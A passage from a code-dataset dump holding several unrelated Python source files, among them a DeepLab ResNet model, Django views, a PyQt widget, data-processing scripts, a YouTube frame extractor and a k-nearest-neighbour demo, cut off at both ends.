* finishes first, then the recursion unwinds and an error occurs\nevalTree(CreateTree('(- 18/3 2)') ) # this one can be evaluated\nCreateTree(' (+ 1 2 )').eval(env)# if you don't print it, it has a value but nothing is shown; there is no Out and the value is discarded, unless you print it in a script or type it into IPython\n\nLessThan(Tree(1),Tree(2)).eval(env)\n\nLessThan(1,2).eval(env)\nLessThan(Tree(1),Tree(2)).eval(env)\nIf(LessThan(Tree(3),Tree(2)),Add(Tree(1),Tree(2)),Add(Tree(3),Tree(4))) .eval(env)\nIf(LessThan(Tree(1),Tree(2)),Add(Tree(1),Tree(2)),Add(Tree(3),Tree(4))) .eval(env)\nWhile(LessThan(Tree(1),Tree(2)),Add(Tree(1),Tree(2))).eval(env)\nCreateTree(' ( if (< 3 2 ) (+ 1 2 ) (+ 3 4))').eval(env)\nCreateTree(' ( if (< 1 2 ) 2 (+ 3 4))').eval(env)# a form without parentheses like this doesn't work yet; it can't be tokenized properly\nCreateTree(' (< 3 2 )').eval(env)\nCreateTree(' (< 1 2 )').eval(env)\nCreateTree(' (while ( < 1 2 ) ( + 1 2 ) ) ')\n# %run diGuiXiaJian.py\n# (* 5 (+ 1 2 ))\n# ( +( * 5 1) 2 )\n# 5 9 8 + 4 6 * * 7 + *\n# ( * ( + 7 ( * ( * 4 6) ( + 8 9 ) ) ) 5 )\n#EvalArray(Tree('*', Tree('+',Tree(1),Tree(2)),Tree(5)))\n    ","sub_path":"diGuiXiaJian - Copy (2).py","file_name":"diGuiXiaJian - Copy (2).py","file_ext":"py","file_size_in_byte":15175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"336746915","text":"import os\nfrom os import listdir\nfrom os.path import isfile, join\n\nwriteFileName = 'trainval.txt'\nwriteFile = open(writeFileName, 'w')\nappended_filenames = [];\ntrainFileName = 'train.txt';\nvalFileName = 'val.txt';\ntrainFile = open(trainFileName, 'r').readlines();\nvalFile = open(valFileName, 'r').readlines();\n\t\t\nfor line in trainFile:\t\t\n\timageFileName = line.split()[0] + '\\n';\n\t#print(imageFileName);\t\t\n\tif imageFileName not in appended_filenames:\t\t\n\t\twriteFile.write(imageFileName);\t\n\t\tappended_filenames.append(imageFileName);\nfor line in valFile:\t\t\n\timageFileName = line.split()[0] + '\\n';\n\t#print(imageFileName);\t\t\n\tif imageFileName not in 
appended_filenames:\t\t\n\t\twriteFile.write(imageFileName);\t\n\t\tappended_filenames.append(imageFileName);\n\n\n\n\t\n\n\n","sub_path":"tools/TrainValParsers/IndividualParsers/writeTrainvalFiles.py","file_name":"writeTrainvalFiles.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115668742","text":"from library import Library\nfrom PyQt5.QtWidgets import QWidget, QLabel, QPushButton, QLineEdit, QVBoxLayout\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont\n\n\n\nclass DeleteBook(QWidget):\n\n def __init__(self,parent=None):\n\n super(DeleteBook,self).__init__(parent)\n self.library = Library()\n self.init_ui()\n\n #Initialize the user interface\n def init_ui(self):\n\n self.textField = QLabel(\"Book Name\")\n self.textField.setAlignment(Qt.AlignCenter)\n self.textField.setFont(QFont('Arial',25))\n self.book = QLineEdit()\n self.delete = QPushButton(\"Delete\")\n self.back = QPushButton(\"Back to Menu\")\n\n v_box = QVBoxLayout()\n v_box.addStretch()\n v_box.addWidget(self.textField)\n v_box.addWidget(self.book)\n v_box.addWidget(self.delete)\n v_box.addWidget(self.back)\n v_box.addStretch()\n\n self.setLayout(v_box)\n self.delete.clicked.connect(self.delete_book)\n self.setWindowTitle(\"Delete\")\n\n def delete_book(self):\n book = self.book.text()\n self.library.delete_book(name=book) \n self.book.clear()\n","sub_path":"LibraryProject/Scripts/deleteBook.py","file_name":"deleteBook.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"4425441","text":"from sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import linear_model\r\nfrom sklearn.cross_validation import train_test_split\r\nnewdata=np.genfromtxt('abalone.data.txt',delimiter=',',dtype=\"|S5\")\r\nfor i in range(0,4177):\r\n if newdata[i,0]=='M':\r\n newdata[i,0]=1\r\n elif newdata[i,0]=='F':\r\n newdata[i,0]=-1\r\n else:\r\n newdata[i,0]=0\r\ny=newdata[:,-1]\r\nx=newdata[:,1:9]\r\nX_train, X_test, y_train, y_test = train_test_split(x, y, random_state=0)\r\nclf=linear_model.LinearRegression()\r\nX_train= np.array(X_train, dtype = 'float_')\r\nX_test= np.array(X_test, dtype = 'float_')\r\ny_train= np.array(y_train, dtype = 'float_')\r\ny_test= np.array(y_test, dtype = 'float_')\r\nclf.fit(X_train,y_train)\r\ny_pred=clf.predict(X_test)\r\n\r\nprint('Coefficients: \\n', clf.coef_)\r\n# The mean square error\r\nprint(\"Residual sum of squares: %.2f\"\r\n % np.mean((clf.predict(X_test) - y_test) ** 2))\r\n# Explained variance score: 1 is perfect prediction\r\nprint('Variance score: %.2f' % clf.score(X_test, y_test))\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621938298","text":"import math\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.utils.model_zoo as model_zoo\nfrom torch.autograd import Variable, Function\nfrom torch.nn.parameter import Parameter\nimport torch.nn.functional as F\nfrom sync_batchnorm.batchnorm import SynchronizedBatchNorm2d\n\naffine_par = True\n\nclass _ASPPModule(nn.Module):\n def __init__(self, inplanes, planes, kernel_size, padding, dilation, BatchNorm):\n super(_ASPPModule, self).__init__()\n self.atrous_conv = nn.Conv2d(inplanes, planes, 
kernel_size=kernel_size,\n stride=1, padding=padding, dilation=dilation, bias=False)\n self.bn = BatchNorm(planes)\n self.relu = nn.ReLU()\n\n self._init_weight()\n\n def forward(self, x):\n x = self.atrous_conv(x)\n x = self.bn(x)\n\n return self.relu(x)\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n torch.nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, SynchronizedBatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\nclass ASPP(nn.Module):\n def __init__(self, inplanes, dilations, BatchNorm, num_classes):\n super(ASPP, self).__init__()\n\n self.aspp1 = _ASPPModule(inplanes, num_classes, 1, padding=0, dilation=dilations[0], BatchNorm=BatchNorm)\n self.aspp2 = _ASPPModule(inplanes, num_classes, 3, padding=dilations[1], dilation=dilations[1], BatchNorm=BatchNorm)\n self.aspp3 = _ASPPModule(inplanes, num_classes, 3, padding=dilations[2], dilation=dilations[2], BatchNorm=BatchNorm)\n self.aspp4 = _ASPPModule(inplanes, num_classes, 3, padding=dilations[3], dilation=dilations[3], BatchNorm=BatchNorm)\n\n self.global_avg_pool = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),\n nn.Conv2d(inplanes, num_classes, 1, stride=1, bias=False),\n BatchNorm(num_classes),\n nn.ReLU())\n self.conv1 = nn.Conv2d(5*num_classes, num_classes, 1, bias=False)\n self.bn1 = BatchNorm(num_classes)\n self.relu = nn.ReLU()\n self.dropout = nn.Dropout(0.5)\n self._init_weight()\n\n def forward(self, x):\n x1 = self.aspp1(x)\n x2 = self.aspp2(x)\n x3 = self.aspp3(x)\n x4 = self.aspp4(x)\n x5 = self.global_avg_pool(x)\n x5 = F.interpolate(x5, size=x4.size()[2:], mode='bilinear', align_corners=True)\n x = torch.cat((x1, x2, x3, x4, x5), dim=1)\n\n x = self.conv1(x)\n x = self.bn1(x)\n #x = self.relu(x)\n\n #return self.dropout(x)\n return x\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n # n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n # m.weight.data.normal_(0, math.sqrt(2. 
/ n))\n torch.nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, SynchronizedBatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n\ndef conv3x3(in_planes, out_planes, stride=1, padding=1, dilation=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=padding, dilation=dilation, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, BatchNorm=nn.BatchNorm2d):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride=stride)\n self.bn1 = BatchNorm(planes, affine = affine_par)\n self.relu = nn.ReLU(inplace=True)\n\n padding = dilation\n self.conv2 = conv3x3(planes, planes, stride=1, padding=padding, dilation = dilation)\n self.bn2 = BatchNorm(planes, affine = affine_par)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None,BatchNorm=nn.BatchNorm2d):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, stride=stride, bias=False) # change\n self.bn1 = BatchNorm(planes, affine = affine_par)\n\n padding = dilation\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=padding, bias=False, dilation = dilation)\n self.bn2 = BatchNorm(planes, affine = affine_par)\n\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = BatchNorm(planes * 4, affine = affine_par)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n return out\n\n\nclass Classifier_Module_V2(nn.Module):\n def __init__(self, dilation_series, padding_series, num_classes, inplane):\n super(Classifier_Module_V2, self).__init__()\n self.conv2d_list = nn.ModuleList()\n for dilation, padding in zip(dilation_series, padding_series):\n self.conv2d_list.append(nn.Conv2d(inplane, num_classes, kernel_size=3, stride=1, padding=padding, dilation=dilation, bias = True))\n for m in self.conv2d_list:\n m.weight.data.normal_(0, 0.01)\n\n def forward(self, x):\n out = self.conv2d_list[0](x)\n for i in range(len(self.conv2d_list)-1):\n out += self.conv2d_list[i+1](x)\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, block, layers, num_classes,BatchNorm=nn.BatchNorm2d):\n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = BatchNorm(64, affine = affine_par)\n\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1, ceil_mode=True) # change\n self.layer1 = self._make_layer(block, 64, layers[0],BatchNorm=BatchNorm)\n self.layer2 = self._make_layer(block, 128, layers[1], 
stride=2,BatchNorm=BatchNorm)\n        self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2,BatchNorm=BatchNorm)\n        #self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4,BatchNorm=BatchNorm)\n        self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4,BatchNorm=BatchNorm,dilations=[4,8,16])\n        if block.__name__ == 'Bottleneck':\n            self.layer5 = self._make_pred_layer(ASPP, 2048, [6,12,18,24], BatchNorm, num_classes)\n        else:\n            self.layer5 = self._make_pred_layer(ASPP, 512, [6,12,18,24], BatchNorm, num_classes)\n\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n                m.weight.data.normal_(0, math.sqrt(2. / n))\n            elif isinstance(m, nn.BatchNorm2d):\n                m.weight.data.fill_(1)\n                m.bias.data.zero_()\n            elif isinstance(m, SynchronizedBatchNorm2d):\n                m.weight.data.fill_(1)\n                m.bias.data.zero_()\n\n    def _make_layer(self, block, planes, blocks, stride=1, dilation=1,BatchNorm=nn.BatchNorm2d,dilations=None):\n        downsample = None\n        if stride != 1 or self.inplanes != planes * block.expansion or dilation == 2 or dilation == 4:\n            downsample = nn.Sequential(\n                nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),\n                BatchNorm(planes * block.expansion,affine = affine_par))\n        layers = []\n        if dilations == None:\n            layers.append(block(self.inplanes, planes, stride,dilation=dilation, downsample=downsample,BatchNorm=BatchNorm))\n            self.inplanes = planes * block.expansion\n            for i in range(1, blocks):\n                layers.append(block(self.inplanes, planes, dilation=dilation, BatchNorm=BatchNorm))\n        else:\n            layers.append(block(self.inplanes, planes, stride,dilation=dilations[0], downsample=downsample,BatchNorm=BatchNorm))\n            self.inplanes = planes * block.expansion\n            for i in range(1, blocks):\n                layers.append(block(self.inplanes, planes, dilation=dilations[i], BatchNorm=BatchNorm))\n        return nn.Sequential(*layers)\n\n    def _make_pred_layer(self, block, inplane, dilation_series, BatchNorm, num_classes):\n        return block(inplane, dilation_series, BatchNorm, num_classes)\n\n    def forward(self, x):\n        x = self.conv1(x)\n        x = self.bn1(x)\n        x = self.relu(x)\n        x = self.maxpool(x)\n        x1 = self.layer1(x)\n        x2 = self.layer2(x1)\n        x3 = self.layer3(x2)\n        x4 = self.layer4(x3)\n        out = self.layer5(x4)\n        return out\n\n\ndef Res_Deeplab(num_classes=21, layers=18):\n    layers = int(layers)\n    if layers == 18:\n        model = ResNet(BasicBlock, [2, 2, 2, 2], num_classes,SynchronizedBatchNorm2d)\n    elif layers == 34:\n        model = ResNet(BasicBlock, [3, 4, 6, 3], num_classes,SynchronizedBatchNorm2d)\n    elif layers == 50:\n        model = ResNet(Bottleneck, [3, 4, 6, 3], num_classes,SynchronizedBatchNorm2d)\n    elif layers == 101:\n        model = ResNet(Bottleneck, [3, 4, 23, 3], num_classes,SynchronizedBatchNorm2d)\n    elif layers == 152:\n        model = ResNet(Bottleneck, [3, 8, 36, 3], num_classes,SynchronizedBatchNorm2d)\n    else:\n        print('unsupported layer number: {}'.format(layers))\n        exit()\n    return model\n","sub_path":"model_nonRW.py","file_name":"model_nonRW.py","file_ext":"py","file_size_in_byte":10564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2842838","text":"#!/usr/bin/python\nfrom transaction.base_task import *\nfrom service.message_define import *\nfrom test_result_enum import *\n\nclass DeleteDiskImageTask(BaseTask):\n    operate_timeout = 5\n    def __init__(self, task_type, messsage_handler,\n                 case_manager,logger_name):\n        self.case_manager = case_manager\n        #logger_name = 
\"task.delete_disk_image\"\n BaseTask.__init__(self, task_type, RequestDefine.delete_disk_image,\n messsage_handler, logger_name)\n \n self.addTransferRule(state_initial, AppMessage.RESPONSE,\n RequestDefine.delete_disk_image, result_success,\n self.onDeleteSuccess)\n self.addTransferRule(state_initial, AppMessage.RESPONSE,\n RequestDefine.delete_disk_image, result_fail,\n self.onDeleteFail)\n self.addTransferRule(state_initial, AppMessage.EVENT,\n EventDefine.timeout, result_any,\n self.onDeleteTimeout) \n\n def invokeSession(self, session):\n \"\"\"\n task start, must override\n \"\"\" \n request = getRequest(RequestDefine.delete_disk_image)\n param = self.case_manager.getParam()\n session.target = param[\"disk\"]\n control_server = param[\"control_server\"]\n request.setString(ParamKeyDefine.uuid, session.target)\n self.info(\"[%08X]request delete disk image '%s' to control server '%s'\"%\n (session.session_id, session.target, control_server))\n \n request.session = session.session_id\n self.setTimer(session, self.operate_timeout)\n self.sendMessage(request, control_server)\n \n def onDeleteSuccess(self, msg, session):\n self.clearTimer(session)\n self.info(\"[%08X]delete disk image success\"%\n (session.session_id))\n \n self.case_manager.finishTestCase(TestResultEnum.success) \n session.finish()\n\n def onDeleteFail(self, msg, session):\n self.clearTimer(session)\n self.info(\"[%08X]delete disk image fail\"%\n (session.session_id))\n self.case_manager.finishTestCase(TestResultEnum.fail)\n session.finish()\n \n def onDeleteTimeout(self, msg, session):\n self.info(\"[%08X]delete disk image timeout\"%\n (session.session_id))\n self.case_manager.finishTestCase(TestResultEnum.timeout)\n session.finish()\n","sub_path":"zctool_v1.25_共享存储/task/delete_disk_image.py","file_name":"delete_disk_image.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"74174692","text":"import argparse\nimport os\nfrom concurrent.futures import ProcessPoolExecutor\n\nimport cv2\nimport h5py\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\n\ndef unpack_and_downscale_hdf_wrapper(run_id_and_hdf_archive_path):\n # unpack arguments\n if len(run_id_and_hdf_archive_path) != 2 and len(run_id_and_hdf_archive_path) != 3:\n raise ValueError(\"Invalid arguments passed to wrapper function\")\n\n return unpack_and_downscale_hdf(*run_id_and_hdf_archive_path)\n\n\ndef unpack_and_downscale_hdf(run_id, hdf_archive_path, outsize=(64, 64)):\n with h5py.File(hdf_archive_path, \"r\", libver=\"latest\") as hdf_archive:\n run = hdf_archive[str(run_id)]\n run = np.array(run)\n\n # first axis is number of sequences, i.e. 
num of channels\n        # move it to the last position because we are interested in resizing\n        # the radar scan\n        run = np.moveaxis(run, 0, -1)\n\n        run = run.astype(np.float32)\n        run = cv2.resize(\n            run, dsize=outsize, interpolation=cv2.INTER_LINEAR\n        )\n        run = run.astype(np.float16)\n        # put the axis back where it was\n        run = np.moveaxis(run, -1, 0)\n\n    return run, run.shape[-1]\n\n\ndef main():\n    parser = argparse.ArgumentParser(\n        description=\"Convert the radar dataset from TAR/ZIP format to HDF5.\"\n    )\n\n    parser.add_argument(\"radar_directory\", type=str)\n    args = parser.parse_args()\n\n    metadata = pd.read_csv(\n        os.path.join(args.radar_directory, \"hdf_metadata.csv\"), index_col=\"id\"\n    )\n    sort_meta = metadata.sort_values(by=\"start_datetime\", ascending=True)\n\n    hdf_archive_path = os.path.join(\n        args.radar_directory, \"hdf_archives\", \"all_data.hdf5\"\n    )\n\n    runs = []\n    count = 0\n\n    with ProcessPoolExecutor() as executor:\n        worker_args = []\n        for run_id in sort_meta.index:\n            # generate argument list\n            worker_args.append((run_id, hdf_archive_path))\n\n        # call with executor\n        with tqdm(total=len(worker_args)) as pbar:\n            for run, c in executor.map(unpack_and_downscale_hdf_wrapper, worker_args):\n                runs.append(run)\n                count += c\n                pbar.update(1)\n\n    runs = np.concatenate(runs)\n\n    print(f\"Processed {count} radar scans\")\n    print(\"runs.shape:\", runs.shape)\n\n    outfile_path = os.path.join(args.radar_directory, \"runs_64x64.npz\")\n    with open(outfile_path, \"wb\") as outfile:\n        np.savez_compressed(outfile, runs)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"data_processing/04_generate_single_npz_resize.py","file_name":"04_generate_single_npz_resize.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"588563555","text":"from django.views.generic import ListView, DetailView\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import render\nfrom django.contrib.auth.models import User\nfrom .filters import PostFilter, F, C, X  # import the filter we just wrote\nfrom .models import Post, Comment\nfrom .forms import PostForm\n\n\nclass PostList(ListView):\n    model = Post\n    template_name = 'posts.html'\n    context_object_name = 'posts'\n    queryset = Post.objects.order_by('-dateCreation')\n    paginate_by = 5  # enable page-by-page (paginated) output\n    form_class = PostForm\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['news'] = Post.objects.all(),\n        context['form'] = PostForm()\n        return context\n\n    def post(self, request, *args, **kwargs):\n        form = self.form_class(request.POST)\n\n        if form.is_valid():\n            form.save()\n\n        return super().get(request, *args, **kwargs)\n\nclass PostSearch(ListView):\n    model = Post\n    template_name = 'search.html'\n    context_object_name = 'posts'\n    # queryset = Post.objects.order_by('-dateCreation')\n    ordering = ['-dateCreation']\n    paginate_by = 1\n\n    def get_filter(self):\n        return PostFilter(self.request.GET, queryset=super().get_queryset())\n\n    def get_queryset(self):\n        return self.get_filter().qs\n\n    def get_context_data(self, *args, **kwargs):\n        return {\n            **super().get_context_data(*args, **kwargs),\n            'filter': self.get_filter(),\n        }\n\ndef user_list(request):\n    f = F(request.GET, queryset=User.objects.all())\n    return render(request, 'user_t.html', {'filter': f})\n\ndef post_list(request):\n    c = C(request.GET, queryset=Post.objects.all())\n    return render(request, 'post_t.html', {'filter': 
c})\n\ndef comment_list(request):\n x = X(request.GET, queryset=Post.objects.all())\n return render(request, 'comment_t.html', {'filter': x})\n\nclass PostDetail(DetailView):\n model = Post\n template_name = 'post_list.html'\n context_object_name = 'post'\n\n","sub_path":"news_portal/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102785080","text":"# -*- coding: utf-8 -*-\n\"\"\"\n you2frame.you2frame\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n A short description.\n\n :authors: 2019 by César Gouveia, see AUTHORS\n :license: CC0 1.0, see LICENSE file for details\n\"\"\"\n\nfrom pytube import YouTube\nimport os\nfrom PIL import Image\nimport imageio\nimport argparse\n\ndef download_you(video_url, save_path):\n \"\"\"\n Function that gets a youtube video url and saves it in\n a local path as mp4 format. \n \"\"\"\n\n print(\"Downloading youtube video...\")\n status = YouTube(video_url).streams.first().download(save_path)\n print(\"Finished downloading {}\".format(status))\n\ndef extract_frames(video_path, frames_path, filename, nframes):\n \"\"\"\n Function that gets a local video and converts it into a\n set of frames\n \"\"\"\n\n for file in os.listdir(video_path):\n\n if file.endswith(\".mp4\"):\n \n videoname = os.path.join(video_path, file)\n vid = imageio.get_reader(videoname, 'ffmpeg')\n fps = int(math.floor(vid.get_meta_data()['fps']))\n dur = int(math.floor(vid.get_meta_data()['duration']))\n\n for i in range(dur):\n frame = vid.get_data(i * fps)\n img = Image.fromarray(frame, 'RGB')\n img.save('%s-%d.jpg' % (filename, i))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--video_url',\n default=\"https://www.youtube.com/watch?v=ArSTeAiFWt4\",\n help='Video url that you want to convert'\n )\n parser.add_argument(\n '--video_path',\n default=\"../data/videos/\",\n help='Directory where you want to save the video'\n )\n parser.add_argument(\n '--frames_path',\n default=\"../data/frames/\",\n help='Directory where you want to save the frames'\n )\n parser.add_argument(\n '--filename',\n default=\"lisboa\",\n help='Name of the frames'\n )\n parser.add_argument(\n '--nframes',\n type=int,\n default=100,\n help='Number of frames per video'\n )\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n download_you(args.video_url, args.video_path)\n extract_frames(args.video_path, args.frames_path, args.filename, args.nframes)\n","sub_path":"you2frame/you2frame.py","file_name":"you2frame.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"348366255","text":"import psycopg2\nimport sys\nimport os\nimport csv\nimport re\nfrom xml.dom.minidom import Text, Element\n\nimport common.globals as g\nimport common.functions as fn\n\n\nclass quota_order_number_origin(object):\n def __init__(self, quota_order_number_id, geographical_area_id, validity_start_date):\n self.quota_order_number_id = fn.mstr(quota_order_number_id)\n self.geographical_area_id = fn.mstr(geographical_area_id)\n self.validity_start_date = fn.mdate(validity_start_date)\n self.validity_end_date = \"\"\n self.update_type = \"3\"\n\n self.cnt = 0\n self.xml = \"\"\n\n self.get_geographical_area_sid()\n self.get_quota_order_number_sid()\n g.app.last_quota_order_number_origin_sid += 1\n 
self.quota_order_number_origin_sid = g.app.last_quota_order_number_origin_sid\n\n def get_geographical_area_sid(self):\n sql = \"\"\"select geographical_area_sid from geographical_areas\n where geographical_area_id = %s order by validity_start_date desc limit 1\"\"\"\n params = []\n params.append(self.geographical_area_id)\n cur = g.app.conn.cursor()\n cur.execute(sql, params)\n rows = cur.fetchall()\n if len(rows) > 0:\n self.geographical_area_sid = rows[0][0]\n else:\n self.geographical_area_sid = -1\n\n def get_quota_order_number_sid(self):\n sql = \"\"\"select quota_order_number_sid from quota_order_numbers\n where quota_order_number_id = %s order by validity_start_date desc limit 1\"\"\"\n params = []\n params.append(self.quota_order_number_id)\n cur = g.app.conn.cursor()\n cur.execute(sql, params)\n rows = cur.fetchall()\n if len(rows) > 0:\n self.quota_order_number_sid = rows[0][0]\n else:\n self.quota_order_number_sid = -1\n\n def writeXML(self, app):\n out = app.quota_order_number_origin_XML\n\n out = out.replace(\"[QUOTA_ORDER_NUMBER_ORIGIN_SID]\", str(self.quota_order_number_origin_sid))\n out = out.replace(\"[QUOTA_ORDER_NUMBER_SID]\", str(self.quota_order_number_sid))\n out = out.replace(\"[VALIDITY_START_DATE]\", self.validity_start_date)\n out = out.replace(\"[VALIDITY_END_DATE]\", self.validity_end_date)\n out = out.replace(\"[GEOGRAPHICAL_AREA_SID]\", str(self.geographical_area_sid))\n out = out.replace(\"[GEOGRAPHICAL_AREA_ID]\", self.geographical_area_id)\n\n out = out.replace(\"[UPDATE_TYPE]\", self.update_type)\n out = out.replace(\"[TRANSACTION_ID]\", str(app.transaction_id))\n out = out.replace(\"[MESSAGE_ID1]\", str(app.message_id))\n out = out.replace(\"[RECORD_SEQUENCE_NUMBER1]\", str(app.message_id))\n\n out = out.replace(\"\\t\\t\\t\\t\\n\", \"\")\n self.xml = out\n\n app.transaction_id += 1\n app.message_id += 1\n","sub_path":"create-data/create_reference_data/common/quota_order_number_origin.py","file_name":"quota_order_number_origin.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179923712","text":"import numpy as np\nimport pandas as pd\nimport csv\nfrom geopy.distance import vincenty\nimport random\n\n#plz_nrw = pd.read_csv('https://raw.githubusercontent.com/mexemt/location_optimization/master/Datasets/plz_nrw.csv', encoding='unicode_escape')\nplz_nrw = pd.read_csv('C:/Users/maxim/Documents/GitHub/location_optimization/Datasets/plz_nrw.csv', encoding='unicode_escape')\nplz_nrw = pd.DataFrame(plz_nrw)\ndistances = pd.read_csv('C:/Users/maxim/Documents/GitHub/location_optimization/Datasets/distances.csv', encoding='unicode_escape', index_col=0)\ndistances = pd.DataFrame(distances)\n\nclass locations:\n def __init__(self, name, plz_nrw, rng):\n self.name = name\n self.locations = plz_nrw\n self.rng = rng\n self.locations['open'] = 0\n self.locations['fixed_costs'] = 0\n self.locations['fixed_costs'] = [random.choice(self.rng) for x in self.locations['fixed_costs']]\n\nrng_cost_fx_low = range(10000, 20000)\nloc = locations('low', plz_nrw, rng_cost_fx_low)\nlocations = loc.locations\n\nprint(locations)","sub_path":"Code/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"165304495","text":"# Pure numpy k-nearest neighbors demo with OpenCV visualization\n# Written by Matt Zucker, April 2017\n\nimport numpy as np\nimport 
cv2\n\n######################################################################\n# Define some constants\n\nSIZE = 512\nNUM_POINTS = 1000\n\n######################################################################\n# OpenCV has fast matching code, but the Python interface to it\n# changes significantly from version to version. This is a reasonably\n# fast pure numpy k-nearest-neighbor function that you might find\n# helpful for your own code.\n\ndef bruteforce_knn(points, p, k):\n\n assert(len(p) == points.shape[1])\n\n diff = points - p\n d = (diff**2).sum(axis=1)\n idx = np.argpartition(d, k)\n\n idx = idx[:k]\n d = d[idx]\n\n idx2 = np.argsort(d)\n return idx[idx2], np.sqrt(d[idx2])\n\n######################################################################\n# Show a nice demo illustrating knn search\n\ndef main():\n\n # Sample a bunch more points than we actually need because we will do\n # rejection sampling below.\n points = np.random.random((NUM_POINTS*4, 2))*SIZE\n\n # Reject points not inside the \"donut\" we want to display\n diff = points - (SIZE/2, SIZE/2)\n d = np.sqrt((diff**2).sum(axis=1))\n donut_mask = (d < SIZE/2 - 8) & (d > SIZE/8)\n points = points[donut_mask]\n\n # Trim down to the desired number of points\n points = points[:NUM_POINTS].astype(np.float32)\n\n # Create a background image with each point\n background = 255*np.ones((SIZE, SIZE, 3), dtype='uint8')\n\n for p in points:\n cv2.circle(background, tuple(p.astype(int)), 3, (0, 0, 0), -1, 16)\n\n # Pop up a window\n #cv2.namedWindow('knn')\n cv2.imshow('knn', background)\n\n ##################################################\n # Define a mouse handling function:\n\n def mouse(event, x, y, flags, param):\n\n # Create a point to match\n p = np.array([x,y], dtype=np.float32)\n\n # Do our brute-force knn search\n matches, dists = bruteforce_knn(points, p, 3)\n\n # Display the point and the neighbors\n display = background.copy()\n\n cv2.circle(display, (x, y), 3, (255, 0, 255), 1, 16)\n\n colors = [ (0, 0, 255),\n (0, 255, 0),\n (255, 0, 0) ]\n\n for color, i in zip(colors, matches):\n\n pi = 